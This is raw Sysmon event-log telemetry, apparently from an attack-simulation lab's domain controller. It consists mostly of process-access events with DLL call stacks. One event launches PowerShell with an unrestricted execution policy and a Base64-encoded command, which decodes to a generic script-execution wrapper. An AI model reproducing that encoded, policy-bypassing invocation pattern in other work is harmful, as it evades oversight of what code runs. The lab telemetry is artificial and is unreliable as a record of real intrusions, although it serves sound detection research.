08:42:01.292{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002784Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.292{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002783Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.292{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002782Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.292{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002781Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.292{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002780Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.292{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002779Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.292{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002778Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.292{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002777Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.292{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002776Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.292{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16D9-5F84-8400-000000007F01}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002775Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.292{5D479F2C-16D9-5F84-8300-000000007F01}10124380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16D9-5F84-8400-000000007F01}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e8b5331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7ff41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7ff3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e8aa54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7fb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e8012edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7ff6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7ff6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7ff63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7fe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7ff4889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7ff447c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7ff41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7ff3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e8aa54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7fdacd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+e7fda2a7(wow64) 154100x80000000000000002774Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.299{5D479F2C-16D9-5F84-8400-000000007F01}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-16D9-5F84-91E5-040000000000}0x4e5910HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-16D9-5F84-8300-000000007F01}1012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000002773Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.230{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16D9-5F84-8300-000000007F01}1012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002772Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.230{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16D9-5F84-8300-000000007F01}1012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x80000000000000002771Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.198{5D479F2C-16D9-5F84-8300-000000007F01}1012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vr1nvybe.tir.ps12020-10-12 08:42:01.198 10341000x80000000000000002770Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16D9-5F84-8300-000000007F01}1012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002769Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.167{5D479F2C-16D9-5F84-8100-000000007F01}42644268C:\Windows\system32\conhost.exe{5D479F2C-16D9-5F84-8300-000000007F01}1012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002768Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:01.167{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002767Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 